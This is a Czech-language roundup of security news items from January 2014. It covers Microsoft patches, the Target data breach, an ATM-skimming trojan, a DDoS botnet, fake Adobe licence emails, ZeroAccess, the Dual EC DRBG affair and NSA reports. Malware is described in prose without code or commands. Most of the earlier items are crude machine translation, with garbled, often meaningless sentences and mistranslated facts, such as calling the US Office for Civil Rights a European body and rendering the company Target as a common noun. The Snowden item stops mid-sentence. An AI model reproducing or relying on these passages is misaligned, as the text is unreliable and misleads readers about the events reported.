se rozjíždí do lehkého startu s Microsoftem. Pouze čtyři informační zprávy v předem oznámení lednového. Poprvé ve chvíli, není kumulativní IE srolovat náplast. To musí být znamení, že tým IE byl nakonec dovolen vzít nějaký čas volno přes prázdniny s ohledem na vyčerpávající 2013 dali dovnitř Očekávat, že již v únoru, není pochyb. Druhý bulletin, pravděpodobně MS14-002, se bude zabývat poněkud očekávané jádro zvýšení oprávnění otázek, známých jako CVE-2013-5065, který byl vykázán, a zveřejněných v listopadu s nějakým omezeným využití ve volné přírodě. Problém se týká pouze Windows XP a systémy 2003, ale pokud používáte ty bych to považují za něco opravit rychle. Třetí bulletin je další zvýšení vydání oprávnění ovlivňující Windows 7 a 2008, takže pokud jste se vyhnul kulce s CVE-2013 -5065, jste stále ovlivněny jeden. No jak se z něj v tomto měsíci. Čtvrtý bulletin je odepření služby ve zřídka viděný Microsoft Dynamics produktu. To je asi tak marginální obavy, jak se můžete dostat do, pokud jde o MS rad. je to docela snadné priorit v tomto měsíci. Patch MS14-001, a pak podle toho, o 002 nebo 003 se na vás vztahují. Patch DoS v MS Dynamics, když jste opravdu nudí někdy ... ne, dělám si srandu. Máte-li Dynamics ve svém prostředí, to nelze přehlížet to. Je to typ systému, kde výpadek může mít materiální náklady pro vaše podnikání. autor: Ross Barrett, Senior Manager Security Engineering, Rapid7.
Yahoo Mail má nyní HTTPS ve výchozím nastavení
18.1.2014 Ochrana
S krátkou blogu, Yahoo SVP komunikačních produktů Jeff Bonforte oznámila, že společnost začala šifrovat všechny spoje mezi jejich uživateli a Yahoo Mail.
"Pokaždé, když používáte Yahoo Mail - ať už je to na webu, mobilní web, mobilní aplikace, nebo přes IMAP, POP nebo SMTP-to je 100% implicitně šifrována a chráněna 2048 bitových certifikátů," řekl napsal . "Toto šifrování se vztahuje i na vaše e-maily, přílohy, kontakty, stejně jako kalendář a Messenger v aplikaci Mail." Ale Ivan Ristic, technický ředitel v Qualys a zakladatel SSL Labs, testovala některé servery a říká, že implementace HTTPS je . není konzistentní na všech z nich Některé HTTPS e-mailové servery Yahoo použít slabý preferovaný šifru (RC4), některé AES šifra, ale nebyly realizovány snižující závažnost rizika pro známé útoky proti ní (např. BEAST a trestné činnosti ), a nikdo z firmy je Servery zkontroloval podpory vpřed tajemství (něco, co Google už udělal cestu zpět v roce 2011, a Facebook a Twitter loni). "Myslím, že bychom měli akceptovat, že Yahoo potřebuje čas, aby si své servery, aby, pokud jde o kódování, ale možná je třeba, aby byly transparentnější, co plánují a dělají, "řekl Ristic na Lucian Constantin . "Například, já bych raději vidět něco v duchu:" My jsme udělali tyto další věci ještě, ale tady je náš plán pro jejich řešení "." No, alespoň Yahoo se konečně začali dělat něco o tom -.
Klíčové trendy pro správu identit a přístupu
18.1.2014 Bezpečnost
CA Technologies oznámila, že předpovědi v oblasti správy identit a přístupu (IAM) a jejich dopad na bezpečnostní profesionály v roce 2014.
"Jsme přesvědčeni, že trendy technologie mraků, mobilní a sociální bude i nadále silně ovlivňovat směr a je třeba pro IAM v roce 2014, ale také vidět nové obchodní požadavky a účinných technologií spojování do dát twist na IAM a bezpečnostní cestu pro mnoho organizací, "řekl Mike Denning, senior viceprezident a generální ředitel, Bezpečnostní podnikání, CA Technologies. 1. Software definovaný, Open Enterprise se objeví: podnik je předělání se do platformy, které mohou vývojáři experimentovat s a inovovat na. Každý IT vrstva z dat do aplikace na infrastruktuře do sítě se stávají service-aktivní a softwarově definované pomocí API. Vzor přesahuje datového centra ke společníkům a cloud služeb, podniky jsou nuceny otevřít. Nová vlna inovací bude ohlašoval jako vývojáři uvnitř i vně získat přístup podniku k základní stavební bloky, které definují organizaci. Tím se urychlí experimentování a inovace, jak se postavit nové mashup využitím celé řady softwarových definována majetku. Tradiční IT oddělení budou muset vyvíjet na ochranu a bezpečný přístup k těmto novým aktiv, jako stavební bloky pro agilní vývoj. 2. Hardwarové prvky v mobilních zařízeních se stává stále důležitější součástí IAM: Uživatelé budou i nadále přijímat nové mobilní zařízení na krátké (12 - 24 měsíc) cyklus, rychle dělat pokročilé bezpečnostní hardware technologie, jako je ARM TrustZone, široce dostupné. Výrobci zařízení bude stavět bezpečnostních systémů, jako je například Samsung Knox, na vrcholu těchto technologií. Tyto systémy pomohou vyřešit BYOD výzvy podniky čelit tím, že poskytuje bezpečné způsoby, jak oddělit firemní a osobní data a aplikace. Kromě zajištění zařízení sami, budou moci uživatelé použít k identifikaci sebe do jiných systémů a provádět pokročilé funkce, jako je bezpečné platby. Telefon se konečně začínají etablovat jako primární a bezpečný způsob ověřování uživatelů a prokázání totožnosti. 3. Nedostatek škálovatelné identity dokazování bude i nadále otravovat širší B2C/G2C nasazení: Nedávné on uživatelské zkušenosti jako součást obamacare zavádění demonstroval logistické problémy ověřování on-line identity v přesné a škálovatelné způsobem. Jak více a více uživatelů se zapsat do on-line služby , výrazně zvýší poptávka po identity pravopisu služby, ale organizace bude i nadále docházet identity pravopisu výzvy. Zatímco zdroje o vydání identifikačního izolační dat bude i nadále rozšiřovat s digitalizací a vystavení nových veřejných a soukromých záznamů, bude toto pokračovalo požadavek identity kynutí v roce 2014 přinutit toto odvětví spolupracovat a partner blíže dodat škálovatelné identity bariérou pro uspokojení těchto potřeb . 4. Společná organizace trhu se stal novou silou pro široké iniciativy pro správu identit: Úspěšný marketing závisí na pochopení potřeb zákazníků a poskytnout jim praktické zkušenosti pro registrace a zápisu. Umožňuje sociální přihlášení a udržování firemní přítomnost na sociálních sítích poskytuje příležitost zachytit cenné údaje o zákaznících, včetně uživatelských identit, vzory sociální interakce, a procházení a nákup tendence. CMO bude usilovat o těchto možnostech pomoci firmě zapojit se svými zákazníky, vytvořit silnější vztahy s nimi, a zlepšit loajalitu. Infrastruktury pro správu identit, které podporují tyto marketingové iniciativy budou mít lepší poptávce jako "obchodní Enablement" zisky širšího uznání jako kritické řidič IAM. 5. Ověřování na základě rizik expanduje za finanční služby: Zatímco firemní touha po zaměstnance a zákaznický mobilní enablement je silný, bezpečnostní mechanismy, které jsou těžkopádné pro spotřebitele zvyklé na okamžitý přístup se setkal s odporem nebo all-out vyhýbání se daňovým povinnostem. Potřeba jak pro silnější autentizaci a pozitivní uživatelské zkušenosti povede k širokému přijetí ověřování založeného na posouzení rizik, v němž jsou kontextuální údaje o uživateli, zařízení, aplikací, lokalit a dalších potenciálních rizikových faktorů shromážděny a analyzovány k určení rizik na úrovni identity uživatele. Financial Services byl lídrem v oblasti přijímání ověřování založené na analýze rizika vzhledem k vysoké hodnotě mnoha zákaznických transakcí. Ale, bude tato technologie začíná být více široce přijata v rámci ostatních průmyslových odvětvích, jako je potřeba pro zlepšení bezpečnosti bez dopadu na uživatelský komfort zvyšuje.
Bezpečnostní Jaké zdravotní péče a ochrany osobních údajů profesionálové přát
18.1.2014 Bezpečnost
2013 se ukázalo být závratná rok pro zdravotnictví dodržování, ochrany soukromí a zabezpečení informací: zákon cenově dostupnou péči, prosazování HIPAA Omnibus Final pravidla, a pokračující vyšetřování prováděném Evropským úřadem pro občanská práva (OCR). Nemluvě o tom, že je potřeba pokračovat rizik a krizového řízení, C-Suite komunikace, řízení obchodních partnerů, porušit oznámení a šetření ze strany Úřadu pro občanská práva (OCR). ID Odborníci zeptal zdravotnictví shodu, soukromí a bezpečnosti informačních důstojníků sdílet . jejich předpovědi a poskytují své přání seznamy pro hladší a více kompatibilní 2014 Aby bylo možné lépe řídit jejich současných programů, bezpečnost, dodržování a ochraně osobních údajů důstojníky zdravotnické organizace požadují pět věcí: více školení, více zaměstnanců, vzrostl rozpočet, pomoci s audity , a software soulad pomoci s lavinou narušení dat zákonů. Toto se vyrovná zjištění z třetí výroční srovnávací studie Ponemon Institute na pacienta Ochrana osobních údajů a zabezpečení dat, o tom, že většina zdravotnických organizací nemají dostatečné zdroje, rozpočet, nebo kontroly na místě minimalizovat narušení bezpečnosti incidenty dat. Kdybych měl víc rozpočet, bych přál:
Dodržování víla kropení dodržování prachu a všichni zaměstnanci dodržovat pravidla. Pokud tak neučiní, budou zmizí.
Více zaměstnanci, proaktivní přístup k auditu software
Více školení; více zdrojů k financování auditu výlety ".
Nová pozice, které mají být financovány: někdo na rozvoj ochrany osobních údajů školení bude první kontakt pro dotazy a pomáhat při přezkumu a šetření stížností.
Osvědčených postupů, state-of-the-art, sledování dodržování systému.
Přál bych si, každý audit by mohlo být provedeno externí firmou.
Interní auditoři a člověk věnuje subdodavateli činnosti související s dohledem.
Další zaměstnanci, které vám pomohou se všemi pravidly a předpisy, a psát politik.
Nejlepší dostupný software pro audit za nevhodné přístup k záznamu.
Kdybych měl více kontroly, bych přál:
Čas být aktivnější a více času soustředit se na vzdělávání, monitorování a celkové intenzifikaci programu ochrany osobních údajů.
Už žádné zdravotnictví, soukromí nebo bezpečnost, zákony a předpisy změnit na příštích pět let.
Monitorovací software musí být nainstalován na audit všem zaměstnancům za nevhodné záznam prohlížení a sledování využití těchto internetových stránek non-práce související.
Méně vládní pravidla, více péče o pacienty.
Prostor plný úvazek styk splnění pracovníci na všech místech v celém státě.
Zvýšená zpráv, a vládní (státní a federální) prosazování pravidel ochrany osobních údajů a bezpečnosti.
Co je před námi může vyžadovat více než jen dodržování víla zvládnout očekávaný: zvýšená zpráv a intenzivnější audit, další státní a federální vymáhání soukromí, bezpečnosti a pravidel o narušení, a rezignaci vedoucích pracovníků vzhledem k novým požadavkům na odpovědnosti.
Osobní info 70 milionů cílových zákazníků ohrožena
18.1.2014 Hacking | Kriminalita
Cílová dnes oznámila, aktuální informace o své pokračující vyšetřování nedávné porušení dat . Jako součást cílových probíhající soudní vyšetřování, bylo zjištěno, že některé informace host - odděleně od dat platebních karet dříve popsanými - byla přijata v průběhu narušení dat.
Tato krádež není nový porušení, ale byl odhalen jako součást probíhajícího vyšetřování. V tomto okamžiku, vyšetřování zjistí, že ukradené informace zahrnují jména, poštovní adresy, telefonní čísla nebo e-mailové adresy pro až 70 milionů lidí. Většina těchto údajů je částečná v přírodě, ale v případě, že cíl má e-mailovou adresu, Společnost se bude snažit kontaktovat postižené hosty. Tato komunikace bude informační, včetně tipů na ochranu proti spotřebitelské podvody. Cílová nebude žádat ty hosty, aby poskytovat žádné osobní informace jako součást tohoto sdělení. "Já vím, že je to frustrující pro naše hosty, aby se dozvěděli, že tato informace byla přijata, a my jsme opravdu líto, že mají na to vydržet," řekl Gregg Steinhafel , předseda představenstva, prezident a generální ředitel společnosti, Target. "Chci také, aby naši hosté věděli, že porozumění a sdílení fakta vztahující se k této události je pro mě důležité a celý Target týmu." Hosté budou mít nulovou odpovědnost za náklady jakýchkoliv podvodných poplatků vyplývajících z porušení. Chcete-li poskytnout další klid, Target nabízí jeden rok zdarma úvěrového monitoringu a ochrany proti krádeži identity pro všechny hosty, kteří nakupovali našich obchodech v USA. Hosté budou mít tři měsíce na to, zapsat do programu.
Výbor pro EU žádá Snowdena vypovídat prostřednictvím video spojení
18.1.2014 IT
S ohromující hlasování o 36-k-2 (plus jeden se zdržel hlasování), členové spravedlnosti a občanských svobod výboru Evropského parlamentu se rozhodl pozvat na někdejší NSA dodavatele Edward Snowdena vypovídat v jednání o americkém dohled a jak na ochranu soukromí občanů EU.
Svědectví by se stalo, prostřednictvím video spojení, jako Snowden je stále v exilu v Ruské federaci, a EU a její členské státy se ostře vyhnout nabídnout azyl amerického informátora a uprchlík. Podle BBC , členové parlamentu již kontaktován Snowden je právní zástupce v Rusku na JV, zda by byl ochoten vypovídat, ale to je příliš brzy na to říci, zda bude akceptovat. konzervativní UK politik Timothy Kirkhope, který je jedním ze dvou členů výboru pro spravedlnost a občanské svobody, kteří hlasovali proti návrhu , který řekl, že pochybuje o tom, že tato svědectví se nikdy nestane. "Alespoň pokud Snowden chce vypovídat, aby poslanci, že nyní bude muset vyjít ze stínu a riskovat jeho pozici se objevil. Výbor bylo jasné, že pokud Snowden není ochoten se objeví v interaktivní relaci pak důkaz nesmí pokračovat, "dodal. To by mohlo ukázat, že je jedna věc, která zabrání Snowdena svědčit. Také, když on byl udělen azyl v Rusku, ruský prezident Vladimir Putin jasně řekl, že se musí zastavit činnosti zaměřené na poškození USA. ale, jak víme, že úniky nejsou zastavil, a Snowdenová občas řešit veřejnosti a veřejně určeno Brazílie vláda nabízí svou pomoc proti proti americkým špionáže úsilí, a to vše ještě nedostal ho vykopli z Ruska, takže je nepravděpodobné, že tato svědectví by
Strach ze sdílení dat na vzestupu
18.1.2014 Bezpečnost | Ochrana
Americké spotřebitelské postoje a chování související jak sdílení dat a sociálních médií oversharing výrazně posunul právě během posledních dvou let, podle nové studie McCann Worldgroup. Tato "kyvadla" se odehrává na všech úrovních generačně, ale je nejvýraznější mezi dospívající, jejichž "migrace" v rámci sociální mediálních kanálů odráží rostoucí obavy o šikaně kromě vyvíjející se názory na to, co je v pohodě, nebo ne. Výzkum zjistil, že tyto nápadné změny v průběhu posledních dvou letech:
# 1 privacy strach, že výrazně vzrostl od roku 2011 je, že vláda bude nakládat s osobními údaji lidí proti nim nějakým způsobem.
Společnosti považovány za největší hrozbu a že jsou nejméně důvěryhodné se údaje firmy Silicon Valley, jako je Google a Facebook.
Co se nezměnilo, ale je, že banky jsou stále nejvíce důvěryhodné instituce, pokud jde o správné použití citlivé osobní informace.
V překvapivé, twist, studie také odhalilo nové obavy, jakési "ochraně osobních údajů vůle", který má mnohem více co do činění s novým spotřebitele etikety kolem toho, co a jak sdílet on-line. "Selfie," například, může být 2013 je slovník slovo roku, ale jen pod polovina amerických pod 34 říkají selfies nejsou v pohodě. Podobně, odráží, že to není jen mladý generační trend, 77% lidí ve věku nad 35 let zvážit vyslání časté selfies na Instagram být "cool." "Našli jsme důkazy o nový trend směrem k bytí více selektivní a výhradní když jde o sdílení, a to i mezi dospívající generaci, "řekla Nadia Tůma, zástupce ředitele, McCann Pravda Central. "Jako jeden z našich mladých lidí, řekl," kyvadlo se obrací směrem k větší soukromí. " To může vysvětlovat, proč mladí lidé se stěhují z Facebooku do Snapchat . To se stává chladnější být trochu tajemný, jako to je velmi vyhledávání na Google. " "Se sociální sítě na sebe bere více dominantní roli v našem životě, čelíme nesčetné potenciálních sociálních úskalí, "řekla Laura Simpson, globální ředitel McCann Pravda Central. "Naše zjištění ukazují na nových pravidlech pro navigaci do světa, kde soukromí a publicity srazí. Výzva spočívá v udržení křehké rovnováhy mezi dělat sami se vám zdá zajímavý, aniž by se nadarmo." obavy o soukromí, včetně šikany jako aspektu, mají výrazný vliv na migrační mládež vzorů s ohledem na sociální média. Vzhledem k tomu, trvalost textů, tweetů a aktualizace stavu, šikana se mění způsob, jakým se lidé chovají on-line. Například, mládež v průzkumu vysvětlen jejich migraci z Facebooku do Snapchat jako je částečně přičítán větší soukromí (a tudíž méně šikany). ale šikana je pouze jedním z toho, co by se dalo nazvat "4. B je", které se definují v současné době přijata sdílení a soukromí cvičí s ohledem na sociální média. Kromě šikany, mezi ně patří vyhnout nudné, Tesařství a žebrání chování stejně. Boring:
Pouze 34% lidí si myslí, vysílání rutinní činnosti jako aktualizace stavu na Facebooku je COOL
Na druhou stranu, 64% lidí si myslí, že méně osobní přístup často posíláte hloupé a vtipné články o Facebooku je COOL.
Se může pochlubit:
Pouze 35% lidí si myslí, často "dohlížel" svého umístění na Foursquare je COOL
63% lidí si myslí, mají osobní styl blog, který kroniky vaše každodenní oblečení je cool.
Žebrání:
73% lidí si myslí, přidávat lidi, které neznáte, jak LinkedIn připojení je nudný
72% lidí si myslí, přidávat lidi, které neznáte, jak přátel na Facebooku je nudný
63% lidí si myslí, defriending lidé, kteří nejsou vaše "skutečné" přátele na Facebooku je v pohodě.
Barracuda Networks představila Backup-as-a-Service
18.1.2014 IT
Barracuda Networks oznámila svůj nový Backup-as-a-Service (Baas), nabídku, která umožňuje Barracuda Backup 190 a 390, které mají být zakoupen jako roční službu, která zahrnuje zařízení, Energize Updates, Instant Replacement a neomezený Cloud skladování.
Tato nová služba umožňuje zákazníkům alternativní metody včetně Barracuda Backup s menším up-front náklady, zatímco ještě poskytuje oceněnou funkčnost výrobku. "Nákup Backup-as-a-Service je jednoduchý a nákladově efektivní způsob pro zákazníky k uspokojení svých potřeb zálohování, "řekl Rod Mathews, GM zavazadel, Barracuda. "Program Baas poskytuje zákazníkům větší flexibilitu ke koupi Barracuda Backup tak, že lépe vyhovuje jejich potřebám, buď od jejich provozní a kapitálové rozpočty." Highlights:
Lokální spotřebiče pro rychlé zálohování okna a doby obnovení
Site licence pro software Barracuda potřebné k zálohování a obnovení dat
Neomezený Cloud storage - cenová paušálu pro Barracuda Backup cloud skladování (až do limitu Barracuda spotřebiče)
24 x 7 x 365 oceněné telefon a e-mailová podpora
Následující pracovní den zásilka náhrada v případě selhání hardwaru
Nový přístroj (stejný model) Náhradu za jednotky, které jsou čtyři roky a stále na základě smlouvy o poskytování služeb
Přístup k Cloud LiveBoot pro offsite obnovení VMware virtualizovaných serverů.
Barracuda Backup 190 a 390 servisní balíčky jsou k dispozici okamžitě v USA Barracuda Backup US ceníková cena začíná na 1199 dolarů USD za roční službu 190 a US ceník začíná na 2999 dolar USD za rok 390 služby. Oba balíčky obsahují zařízení, Energize Updates, Instant Replacement a neomezený Cloud skladování.
Efektivní nové info trojské stěry karty z široce používaných bankomatů
18.1.2014 Viry
Vědci z Ruské AV závodním lékařem Web podařilo dostat své ruce na Trojan zaměřené na evidenci a shromažďování informací o kartě z jedné z nejrozšířenějších typů strojů ATM. Bohužel, neměli říkat, který z nich.
"Trojan.Skimer.18 není v žádném případě první backdoor nakazit software Bankomat, ale je to první cílové zařízení tak běžné na celém světě," vědci vysvětlil jeho význam. Trojan přichází v podobě dynamicky propojované knihovně (DLL) a se nahraje prostřednictvím infikované aplikace. Jakmile které získalo oporu na stroji, okamžitě vytvoří soubor protokolu, který bude ukládat ukradené informace -. Stopa 2 údaje (číslo karty / účtu, datum platnosti, servisní kód) a kódy PIN "Je pozoruhodné, že v zájmu zachování důvěrnost, výrobci bankomatů využívají speciální technologie, která usnadňuje šifrovaný přenos kódů PIN zadali do bankomatů, a šifrovací klíč je pravidelně aktualizován ze serveru banky, "že poukázal na to , ale dodal, že Trojan.Skimer.18 snadno obchází tuto ochranu a používá software bankomatu k dešifrování kódů PIN. Zločinci ovládat malware pomocí speciálně navržených vzorových karet. Po vložení do slotu pro paměťové karty v bankomatu, tyto karty, aby Trojan dialogové okno vyskočí a umožňují zločinci používat bankomaty klávesnice k interakci s malware . Pokud k tomu budete vyzváni, Trojan může odstranit sám nebo soubor protokolu z infikovaného bankomatu, restartujte počítač nebo změnit jeho provozní režim, a dokonce i sám aktualizovat pomocí aplikace z čipu master karty. Master karty mohou také "stáhnout" již ukradené informace po prvním kompresi souboru.
DDoS botnet šíření na strojích Linux a Windows
18.1.2014 BotNet | Počítačový útok
Blended DDoS botnet se skládá z obou počítačích se systémem Windows a Linux byl zjištěn výzkumníky, kteří pracují s polským CERT. botnet je určen výhradně pro montáž DDoS útoky, zejména zesílení útoků DNS. "To znamená, že útočníci měli zájem jen infikovat stroje, které mají významnou šířku pásma sítě, například servery, "oni poznamenal . "To je pravděpodobně také důvod, proč tam jsou dvě verze bot -. Operační systémy Linux jsou oblíbenou volbou pro serverové stroje" Co mohou říci, útočníci porušil postižených stroje Linux prostřednictvím úspěšného SSH slovníkový útok, pak se přihlásit na něj a stáhnout, instalovat a popraven bot. Linux verze bot se pokusí připojit k serveru C & C přes vysokou TCP portu. "Oba C & C IP a port jsou šifrované," vysvětlili v blogu. "Po spuštění, bot odešle informace o operačním systému (pomocí funkce uname), nešifrovaný a čeká na příkazy." Po analýze malware, došli k závěru, že lze spustit čtyři typy útoků DDoS. Také, že má funkce, které dosud nebyly realizovány. bot zaměřením na operační systém Windows funguje trochu jinak. Jakmile se na počítači, klesne spustitelný soubor a spustí jej, což má za následek trvalé službě Windows daboval DBProtectSupport být registrován a začal. bot také kontakty na serveru C & C také vysokou TCP portů, ale to musí nejprve odeslat dotaz DNS na 8.8.8.8 serveru, aby byl informován o jeho IP adresy. To pak "informuje" server detailů cílového systému po sestavení a odeslání textový soubor. "Tento textový soubor, spolu s faktem, že stejná C & C IP byl použit v obou vzorků malwaru aby nám věřit, že to bylo vytvořeno stejnou skupina, "výzkumníci k závěru. Ale zatímco uživatelé Linuxu mohou zabezpečit své stroje z tohoto útoku výběrem lepší SSH heslo, které jste nezmínil, jak se systém Windows ohrožena na prvním místě
Falešná Adobe "Dodávka licenční klíč", e-maily, provádět malware
18.1.2014 Viry
Chytrý malware distribuce kampaň je v současné době dělá kolech, v podobě e-mailů údajně dodávají licenční klíče pro řadu softwarových nabídky Adobe, varuje MX Lab.
Odesláno z jedné z mnoha zfalšovaných adresami používanými přimět oběti do podezření, že odesílatel je skutečně Adobe ( software@adobes.com , your_order@adobes.com , atd.), zpráva je obvykle variace na "Děkujeme vám za zakoupení [random Software Adobe]. Váš Adobe licence klíč je v přiloženém dokumentu níže. " Připojený soubor ZIP ( License_Key_ [random 6-místný alfanumerický kombinace]. zip ) obsahuje 209 kB velký License_Key_Document_Adobe_Systems_Incorporated.exe soubor, který je v současné době detekován jako nebezpečný podle 17. z 49 AV řešení používaných VirusTotal. je to Trojan umožňuje stahovat další škodlivé soubory z Internetu, a snaží se zabránit výzkumné pracovníky z analyzování a uživatelům špinění ji snaží odhalit využívání virtuálního stroje a známých forenzní nástroje, a ukončit AV produkty. Jako vždy, uživatelé se doporučuje mít na pozoru před nevyžádanými e-maily, a nikdy slepě následovat odkazy a stahovat soubory zahrnuté v nich.
ZeroAccess botnet nadobro?
18.1.2014 BotNet
Když Microsoft a různé donucovací orgány po celém světě narušil na ZeroAccess botnet na začátku prosince, ale nečekal, že zcela eliminovat. Koneckonců, byl botnet byl zaměřen dva měsíce dříve výzkumníky společnosti Symantec, kteří dokázali závrtu velké kus to před jeho mistři se podařilo aktualizovat roboty a opravu bezpečnostních děr, které dovolily vědcům dělat. Také po dlouhou dobu, botnet byl velmi lukrativní byznys pro zločince za ním, a vzali velký péče . udržet v chodu , ale, jak Richard Boscovich, náměstek generální ředitel s Microsoft Digital zločiny jednotky se sdílí ve svém blogu, bot mistři zdánlivě vzdali na botnet:
Jak jsme očekávali, méně než 24 hodin po našem rušivé činnosti, jsou zločinci vytlačila nové pokyny k ZeroAccess infikovaných počítačů, aby mohly pokračovat ve své podvodnou činnost. Nicméně, protože jsme byli sledování jejich činnosti a je schopen identifikovat nové IP (Internet Protocol ) se zabývá zločinci používali k páchání svých zločinů, evropský boj proti kyberkriminalitě centrum Europolu (EC3) se okamžité kroky ke koordinaci s členských zemí činnými v trestním řízení, v čele s Německem je Bundeskriminalamt je (BKA) Cyber Intelligence Unit, rychle vystopovat ty nové IP podvod adresy . Po rychlé reakce BKA je, bot-pastevci vydala jedno další aktualizaci do infikovaných počítačů, která zahrnovala zprávu "WHITE FLAG", což věříme, symbolizuje, že zločinci se rozhodli vzdát se kontroly nad botnet. Od té doby jsme se neviděli žádné další pokusy o Bot pastevců na vydání nového kódu a jako výsledek, botnet je v současné době již nejsou používány ke spáchání podvodu.
Z důvodu tohoto vývoje, Microsoft požádal soud o uzavření civilního případ, že podal proti zločincům, aby činných v trestním řízení může pokračovat ve vyšetřování a doufejme, že je vystopovat. Mezitím, Microsoft se snaží pomoci infikovaných uživatelům čistit jejich počítače, jako ZeroAccess je sofistikovaná a těžko odstranit kus malware.
Mariposa autor bot odsouzen k trestu odnětí svobody
18.1.2014 BotNet
Matjaz Skorjanc, aka Iserdo, byl odsouzen ke čtyřem letům a deseti měsícům vězení minulý týden u Okresního soudu v Mariboru ve Slovinsku. Byl shledán vinným z výroby "nástrojů určených k lámání nebo ilegální vstup do informačního systému" a praní špinavých peněz . On byl také nařídil zaplatit pokutu € 3,000 a byl jeho byt a auto zabaveno, protože oni jsou věřil k byli koupeni výnosů z trestné činnosti. jeho ex-přítelkyně Nusa Coh byl odsouzen na osm měsíců se zkušební dobou na praní špinavých peněz. Skorjanc (27), bývalý student informatiky byl zatčen v červenci 2010 slovinské policie po společné akce s FBI a španělská Guardia Civil. známý v internetovém undergroundu jako Iserdo, byl autorem Butterfly Bot, která byla prodána Španělská zločinecké skupiny, které ji používají k vytvoření Mariposa botnet . Odhady pro počet nakažených systémů se pohybují od 8 do 12.000.000 roboty. stíhání odhaduje, že celkové škody způsobené malware je několik desítek milionů eur. Peníze z prodeje bot byla zpracována Nusa CoH, kteří tvrdí, že jí nebyl vědom protiprávnosti její role.
Nechalo si RSA zaplatit za slabší šifrování?
17.1.2014 Šifrování
Agentura Reuters tvrdí, že NSA zaplatila 10 milionů dolarů za to, že RSA použila úmyslně oslabený šifrovací algoritmus.
Zprávy ze světa bezpečnosti už dávno získaly bulvární tón. Každá přináší další odhalení o tom, jak dlouhé prsty americká agentura NSA ve skutečnosti má, jak rozsáhlá její data sbírající aktivita je a jak se nelze spolehnout na bezpečnost komerčních služeb zpracovávajících data. Dalo by se očekávat, že minimálně široká veřejnost brzy zlhostejní. Kadence a kalibr zpráv si bohužel ale udržuje stupňující trend.
Agentura Reuters o víkendu uveřejnila zprávu, která na základě dvou zdrojů tvrdí, že pravděpodobně nejvýznamnější výrobce bezpečnostních řešení, společnost RSA, přijala 10 milionů dolarů od agentury NSA za to, že v rámci tajné dohody do svého softwaru začlenila úmyslně oslabený šifrovací algoritmus.
Samozřejmě dnes se může zdát podobná částka nepravděpodobně malá, stačí připomenout, že firma RSA byla svého času pohlcena společností EMC za 2,1 miliardy dolarů. Podle agentury Reuters to ale v roce 2006 představovalo více než třetinu příjmů příslušné divize v RSA.
Zpráva se konkrétně týká knihovny BSafe, která byla uvedena v roce 2005 a v roce 2006 byla doporučena americká vládě jako vhodné řešení pro její interní bezpečnostní potřeby. Od roku 2006 je ale jako výchozí generátor pseudonáhodných čísel (klíčová komponenta šifrovacích produktů) používán algoritmus Dual EC DRBG (založený na matematice eliptických křivek), pocházející právě zevnitř NSA.
Dual EC DRBG byl společností RSA, ve které v té době pracovala řada špičkových expertů na bezpečnost, průběžně propagován jako vynikající řešení, přestože byl od samotného počátku zpochybňován odbornou veřejností a již delší dobu je jasné, že obsahuje zadní vrátka umožňující snadné prolomení šifry.
Zmíněná knihovna BSafe je používána řadou bezpečnostních řešení RSA (například RSA Data Protection Manager sloužící pro správu kryptografických klíčů), ale i jiných výrobců. Například představitelé společnosti McAfee vydali prohlášení potvrzující, že Firewall Control Center podporuje Dual EC DRBG, ale pouze když je nasazen na amerických úřadech nebo jejich subdodavatelích, kde ji doporučuje vládní bezpečnostní certifikace FIPS (Federal Information Processing Standards). Ve všech ostatních nastaveních používá novější generátor SHA1 PRNG.
RSA původně zprávu odmítla komentovat, ale v pondělním blogu tvrzení popírá. Vedení společnosti obhajuje původní rozhodnutí o použití algoritmu, ale jeho argumentace byla rozmetána předními bezpečnostními experty.
Jde o další oslabení důvěry ve společnost RSA po tom, co se jim podařilo nechat si ukrást kořenové bezpečností klíče. A bude zajímavé sledovat, co se bude dít s hodnotou jejich akcií. V každém případě tentokrát aktivita NSA zasáhla především americké úřady, jejichž data jsou slabě zabezpečena nejen před NSA, ale i před jakoukoli schopnější cizí agenturou.
Nový škodlivý kód útočí na Apache a Nginx
17.1.2014 Viry
Podle mluvčího společnosti IntelCrawler se v tajných kyberzločineckých fórech objevila nabídka nového malwaru, který je vytvořen jako rozšiřující modul pro webové servery Apache a Nginx.
Nový malware, který dostal název Effusion, může podle popisu v reálném čase vkládat kód do webových stránek umístěných na napadených webových serverech. Vkládání kódu může vytvořit podmínky pro přesměrování na stránky kyberzločinců, kde mohou útočníci pomocí různých taktik sociálního inženýrství podvést uživatele a získat od něj citlivé údaje.
IntelCrawler hlásí, že Effusion pracuje se servery Nginx od verze 0.7 až do současné verze 1.4.4 a také s 32- nebo 64bitovou verzí Apache v systémech Linux nebo FreeBSD. Malware je maskován jako modul, který rozšiřuje základní funkce webového serveru. Škodlivý kód pak může vkládat zadaný obsah různých typů MIME, například JavaScript, HTML, nebo PHP do webových stránek nebo do speciálních formátovacích značek ve zdrojovém kódu stránek. Útočníci mohou také aktualizovat konfiguraci malwaru a vzdáleně sledovat změny kódu.
Malware má také schopnost filtrovat, což obtížnost odhalení neoprávněně vkládaného kódu dále zvyšuje. Effusion podporuje filtrování podle hlavičky, zdroje návštěv uživatelů, uživatelských klientů, adres IP nebo jejich rozsahů. Škodlivý software se současně snaží získat přístup superuživatele root k systému, aby mohl útočník na napadeném serveru podnikat další škodlivé aktivity.
Andrej Komarov, generální ředitel společnosti IntelCrawler, uvedl, že tvůrci modul Effusion na malwarových fórech nabízejí za 2 500 dolarů, což je na tamní poměry celkem vysoká cena. Ta má podle názoru bezpečnostních odborníků omezit počet uživatelů tohoto produktu.
Škodlivé moduly pro Apache nejsou žádnou novinkou, server Nginx se ovšem podobným nekalým záměrům prozatím vyhýbal. Podle analytické společnosti Netcraft má ovšem podíl Nginxu na světové scéně překonat hranici 14 % a stává se proto zajímavý i pro útočníky.
Apple: NSA do iPhonů pronikla bez našeho vědomí
17.1.2014 Mobil | Špionáž
Společnost odmítá, že by americké bezpečnostní agentuře jakkoli pomáhala s přístupem do uživatelských iPhonů i dalších zařízení s operačním systémem iOS.
Německý deník Der Spiegel přišel v tomto týdnu s další zprávou odhalující praktiky americké Národní bezpečnostní agentury. Tentokrát přinesl informaci o programu nazvaném DROPOUT JEEP, který prý NSA používala či stále používá k získání přístupu do velkého množství výpočetních zařízení, mimo jiné i do iPhonů.
Apple se nyní připojil k prohlášením jiných technologických gigantů, jako jsou Google nebo Cisco, a výslovně popřel, že by agentuře při nabourání uživatelských zařízení nějak pomáhal.
